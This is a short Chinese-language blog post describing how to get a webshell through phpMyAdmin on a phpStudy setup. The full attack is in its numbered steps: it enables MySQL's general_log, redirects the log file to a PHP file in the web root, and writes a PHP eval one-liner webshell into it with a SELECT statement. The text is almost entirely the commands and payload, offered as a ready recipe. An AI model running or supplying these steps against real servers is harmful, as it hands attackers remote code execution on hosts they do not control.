1、登录phpmyadmin
2、查看数据路径,作为猜web路径辅助
select @@datadir;
3、查看日志功能是否开启:
(一般这个日志记录是默认关闭的,需要我们手动开启)
show variables like '%general%';
4、开启日志功能:
SET GLOBAL general_log='on';
5、修改日志路径:
set global general_log_file='D:\\phpStudy\\WWW\\shell.php';
6、执行包含shell的语句即可:
select "<?php eval($_POST['gg']);?>";
7、查看结果:
8、ps:发布文章火绒提示webshell….
拓展阅读(点评/知识):
参考来源:
https://zhuanlan.zhihu.com/p/144061985
https://www.jianshu.com/p/cd618e8ef007
本文标题: | phpmyadmin日志getshell测试 |
本文链接: (转载请附上本文链接) | http://vulsee.com/archives/vulsee_2020/1222_13192.html |